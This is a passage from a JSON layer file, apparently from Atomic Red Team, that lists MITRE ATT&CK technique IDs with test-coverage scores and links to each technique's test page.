Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"}]},{"techniqueID":"T1070.005","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.005/T1070.005.md"}]},{"techniqueID":"T1070.006","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"}]},{"techniqueID":"T1070.008","score":6,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.008/T1070.008.md"}]},{"techniqueID":"T1071","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071/T1071.md"}]},{"techniqueID":"T1071.001","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"}]},{"techniqueID":"T1071.004","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.004/T1071.004.md"}]},{"techniqueID":"T1072","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1072/T1072.md"}]},{"techniqueID":"T1074","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074/T1074.md"}]},{"techniqueID":"T1074.001","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"}]},{"techniqueID":"T1078","score":18,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078/T1078.md"}]},{"techniqueID":"T1078.001","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.001/T1078.001.md"}]},{"techniqueID":"T1078.003","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md"}]},{"techniqueID":"T1078.004","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.004/T1078.004.md"}]},{"techniqueID":"T1082","score":33,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"}]},{"techniqueID":"T1083","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1083/T1083.md"}]},{"techniqueID":"T1087","score":34,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087/T1087.md"}]},{"techniqueID":"T1087.001","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"}]},{"techniqueID":"T1087.002","score":24,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.002/T1087.002.md"}]},{"techniqueID":"T1090","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090/T1090.md"}]},{"techniqueID":"T1090.001","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"}]},{"techniqueID":"T1090.003","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.003/T1090.003.md"}]},{"techniqueID":"T1091","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1091/T1091.md"}]},{"techniqueID":"T1095","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1095/T1095.md"}]},{"techniqueID":"T1098","score":24,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}]},{"techniqueID":"T1098.001","score":3,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"}]},{"techniqueID":"T1098.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.002/T1098.002.md"}]},{"techniqueID":"T1098.003","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.003/T1098.003.md"}]},{"techniqueID":"T1098.004","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.004/T1098.004.md"}]},{"techniqueID":"T1105","score":29,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1105/T1105.md"}]},{"techniqueID":"T1106","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1106/T1106.md"}]},{"techniqueID":"T1110","score":21,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110/T1110.md"}]},{"techniqueID":"T1110.001","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"}]},{"techniqueID":"T1110.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.002/T1110.002.md"}]},{"techniqueID":"T1110.003","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"}]},{"techniqueID":"T1110.004","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.004/T1110.004.md"}]},{"techniqueID":"T1112","score":68,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1112/T1112.md"}]},{"techniqueID":"T1113","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1113/T1113.md"}]},{"techniqueID":"T1114","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114/T1114.md"}]},{"techniqueID":"T1114.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.001/T1114.001.md"}]},{"techniqueID":"T1114.003","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.003/T1114.003.md"}]},{"techniqueID":"T1115","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1115/T1115.md"}]},{"techniqueID":"T1119","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1119/T1119.md"}]},{"techniqueID":"T1120","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1120/T1120.md"}]},{"techniqueID":"T1123","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1123/T1123.md"}]},{"techniqueID":"T1124","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1124/T1124.md"}]},{"techniqueID":"T1125","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1125/T1125.md"}]},{"techniqueID":"T1127","score":4,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127/T1127.md"}]},{"techniqueID":"T1127.001","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127.001/T1127.001.md"}]},{"techniqueID":"T1129","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1129/T1129.md"}]},{"techniqueID":"T1132","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132/T1132.md"}]},{"techniqueID":"T1132.001","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"}]},{"techniqueID":"T1133","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1133/T1133.md"}]},{"techniqueID":"T1134","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134/T1134.md"}]},{"techniqueID":"T1134.001","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.001/T1134.001.md"}]},{"techniqueID":"T1134.002","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.002/T1134.002.md"}]},{"techniqueID":"T1134.004","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.004/T1134.004.md"}]},{"techniqueID":"T1134.005","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.005/T1134.005.md"}]},{"techniqueID":"T1135","score":10,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1135/T1135.md"}]},{"techniqueID":"T1136","score":17,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136/T1136.md"}]},{"techniqueID":"T1136.001","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"}]},{"techniqueID":"T1136.002","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.002/T1136.002.md"}]},{"techniqueID":"T1136.003","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.003/T1136.003.md"}]},{"techniqueID":"T1137","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137/T1137.md"}]},{"techniqueID":"T1137.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.002/T1137.002.md"}]},{"techniqueID":"T1137.004","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.004/T1137.004.md"}]},{"techniqueID":"T1137.006","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.006/T1137.006.md"}]},{"techniqueID":"T1140","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1140/T1140.md"}]},{"techniqueID":"T1176","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1176/T1176.md"}]},{"techniqueID":"T1187","score":2,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1187/T1187.md"}]},{"techniqueID":"T1195","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1195/T1195.md"}]},{"techniqueID":"T1197","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1197/T1197.md"}]},{"techniqueID":"T1201","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1201/T1201.md"}]},{"techniqueID":"T1202","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1202/T1202.md"}]},{"techniqueID":"T1204","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204/T1204.md"}]},{"techniqueID":"T1204.002","score":11,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204.002/T1204.002.md"}]},{"techniqueID":"T1204.003","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204.003/T1204.003.md"}]},{"techniqueID":"T1207","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1207/T1207.md"}]},{"techniqueID":"T1216","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216/T1216.md"}]},{"techniqueID":"T1216.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216.001/T1216.001.md"}]},{"techniqueID":"T1217","score":9,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1217/T1217.md"}]},{"techniqueID":"T1218","score":77,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218/T1218.md"}]},{"techniqueID":"T1218.001","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.001/T1218.001.md"}]},{"techniqueID":"T1218.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.002/T1218.002.md"}]},{"techniqueID":"T1218.003","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.003/T1218.003.md"}]},{"techniqueID":"T1218.004","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.004/T1218.004.md"}]},{"techniqueID":"T1218.005","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.005/T1218.005.md"}]},{"techniqueID":"T1218.007","score":11,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.007/T1218.007.md"}]},{"techniqueID":"T1218.008","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.008/T1218.008.md"}]},{"techniqueID":"T1218.009","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.009/T1218.009.md"}]},{"techniqueID":"T1218.010","score":5,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.010/T1218.010.md"}]},{"techniqueID":"T1218.011","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.011/T1218.011.md"}]},{"techniqueID":"T1219","score":11,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1219/T1219.md"}]},{"techniqueID":"T1220","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1220/T1220.md"}]},{"techniqueID":"T1221","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1221/T1221.md"}]},{"techniqueID":"T1222","score":19,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222/T1222.md"}]},{"techniqueID":"T1222.001","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.001/T1222.001.md"}]},{"techniqueID":"T1222.002","score":14,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.002/T1222.002.md"}]},{"techniqueID":"T1482","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1482/T1482.md"}]},{"techniqueID":"T1484","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1484/T1484.md"}]},{"techniqueID":"T1484.001","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1484.001/T1484.001.md"}]},{"techniqueID":"T1484.002","score":1,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1484.002/T1484.002.md"}]},{"techniqueID":"T1485","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.md"}]},{"techniqueID":"T1486","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1486/T1486.md"}]},{"techniqueID":"T1489","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1489/T1489.md"}]},{"techniqueID":"T1490","score":11,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1490/T1490.md"}]},{"techniqueID":"T1491","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1491/T1491.md"}]},{"techniqueID":"T1491.001","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1491.001/T1491.001.md"}]},{"techniqueID":"T1496","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1496/T1496.md"}]},{"techniqueID":"T1497","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497/T1497.md"}]},{"techniqueID":"T1497.001","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"}]},{"techniqueID":"T1505","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505/T1505.md"}]},{"techniqueID":"T1505.002","score":1,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.002/T1505.002.md"}]},{"techniqueID":"T1505.003","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.003/T1505.003.md"}]},{"techniqueID":"T1505.004","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.004/T1505.004.md"}]},{"techniqueID":"T1505.005","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.005/T1505.005.md"}]},{"techniqueID":"T1518","score":16,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518/T1518.md"}]},{"techniqueID":"T1518.001","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"}]},{"techniqueID":"T1526","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1526/T1526.md"}]},{"techniqueID":"T1528","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1528/T1528.md"}]},{"techniqueID":"T1529","score":14,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1529/T1529.md"}]},{"techniqueID":"T1530","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1530/T1530.md"}]},{"techniqueID":"T1531","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1531/T1531.md"}]},{"techniqueID":"T1539","score":3,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1539/T1539.md"}]},{"techniqueID":"T1543","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543/T1543.md"}]},{"techniqueID":"T1543.001","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.001/T1543.001.md"}]},{"techniqueID":"T1543.002","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.002/T1543.002.md"}]},{"techniqueID":"T1543.003","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.003/T1543.003.md"}]},{"techniqueID":"T1543.004","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.004/T1543.004.md"}]},{"techniqueID":"T1546","score":39,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546/T1546.md"}]},{"techniqueID":"T1546.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.001/T1546.001.md"}]},{"techniqueID":"T1546.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.002/T1546.002.md"}]},{"techniqueID":"T1546.003","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.003/T1546.003.md"}]},{"techniqueID":"T1546.004","score":7,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.004/T1546.004.md"}]},{"techniqueID":"T1546.005","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.005/T1546.005.md"}]},{"techniqueID":"T1546.007","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.007/T1546.007.md"}]},{"techniqueID":"T1546.008","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.008/T1546.008.md"}]},{"techniqueID":"T1546.009","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.009/T1546.009.md"}]},{"techniqueID":"T1546.010","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.010/T1546.010.md"}]},{"techniqueID":"T1546.011","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.011/T1546.011.md"}]},{"techniqueID":"T1546.012","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.012/T1546.012.md"}]},{"techniqueID":"T1546.013","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.013/T1546.013.md"}]},{"techniqueID":"T1546.014","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.014/T1546.014.md"}]},{"techniqueID":"T1546.015","score":4,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.015/T1546.015.md"}]},{"techniqueID":"T1547","score":45,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547/T1547.md"}]},{"techniqueID":"T1547.001","score":17,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.001/T1547.001.md"}]},{"techniqueID":"T1547.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.002/T1547.002.md"}]},{"techniqueID":"T1547.003","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.003/T1547.003.md"}]},{"techniqueID":"T1547.004","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.004/T1547.004.md"}]},{"techniqueID":"T1547.005","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.005/T1547.005.md"}]},{"techniqueID":"T1547.006","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.006/T1547.006.md"}]},{"techniqueID":"T1547.007","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.007/T1547.007.md"}]},{"techniqueID":"T1547.008","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.008/T1547.008.md"}]},{"techniqueID":"T1547.009","score":2,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.009/T1547.009.md"}]},{"techniqueID":"T1547.010","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.010/T1547.010.md"}]},{"techniqueID":"T1547.012","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.012/T1547.012.md"}]},{"techniqueID":"T1547.014","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.014/T1547.014.md"}]},{"techniqueID":"T1547.015","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.015/T1547.015.md"}]},{"techniqueID":"T1548","score":42,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548/T1548.md"}]},{"techniqueID":"T1548.001","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.001/T1548.001.md"}]},{"techniqueID":"T1548.002","score":26,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.002/T1548.002.md"}]},{"techniqueID":"T1548.003","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.003/T1548.003.md"}]},{"techniqueID":"T1550","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550/T1550.md"}]},{"techniqueID":"T1550.002","score":3,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.002/T1550.002.md"}]},{"techniqueID":"T1550.003","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.003/T1550.003.md"}]},{"techniqueID":"T1552","score":38,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552/T1552.md"}]},{"techniqueID":"T1552.001","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"}]},{"techniqueID":"T1552.002","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.002/T1552.002.md"}]},{"techniqueID":"T1552.003","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.003/T1552.003.md"}]},{"techniqueID":"T1552.004","score":14,"enabled":true,"links":[{"label":"View 